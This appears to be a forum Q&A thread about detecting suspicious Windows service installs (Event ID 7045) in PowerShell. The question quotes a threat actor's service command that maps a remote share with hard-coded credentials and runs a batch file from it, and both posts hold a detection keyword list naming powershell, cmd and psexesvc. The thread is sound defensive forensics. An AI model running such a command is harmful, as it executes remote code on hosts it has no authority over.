Thank you for all the help I've gotten so far, much appreciated. I have been trying to achieve a simple task: to compare "Image Path" of a Event ID 7045 with a set of pre-defined keywords. The Like isn't working and Compare looks for an exact match.
$sus = @('powershell.exe','cmd.exe','psexesvc.exe')
$7045 = Get-WinEvent -FilterHashtable @{ Path="System.evtx"; Id = 7045 } | select
@{N=’Timestamp’;E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
Id,
@{N=’Machine Name’;E={$_.MachineName}},
@{N=’Service Name’;
E={$_.Properties[0].Value}},
@{N=’Image Path’; E={$_.Properties[1].Value}},@{N=’RunAsUser’; E={$_.Properties[4].Value}},
@{N=’Installed By’; E={$_.UserId}} | where 'Image Path' -match $sus```
I mean, if any of the keywords hit a match, I'd be interested!
To give you an idea, one of the many many malicious services installed by a Threat Actor looked like,
``cmd.exe /c powershell -c "net use \\192.168.100.100 /user:workgroup\test p@ssw0rd123;cmd.exe /c \\192.168.100.100\OutPut\run.bat"
So I kinda have many examples but .. if there was a way to get the Like operator work here, fantastic!
Thank you :)
CodePudding user response:
You can use regex -match instead of like. For that, you need to create a regex string from the executables, combining the names with regex 'OR' (|) and escape the dot with a backslash:
# create a regex for the suspicious executables:
$sus = '(powershell|cmd|psexesvc)\.exe'
# alternatively you can join the array items like this:
# $sus = ('powershell.exe','cmd.exe','psexesvc.exe' | ForEach-Object {[regex]::Escape($_)}) -join '|'
$7045 = Get-WinEvent -FilterHashtable @{ LogName = 'System';Id = 7045 } |
Where-Object { $_.Properties[1].Value -match $sus } |
Select-Object Id,
@{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
@{N='Machine Name';E={$_.MachineName}},
@{N='Service Name'; E={$_.Properties[0].Value}},
@{N='Image Path'; E={$_.Properties[1].Value}},
@{N='RunAsUser'; E={$_.Properties[4].Value}},
@{N='Installed By'; E={$_.UserId}}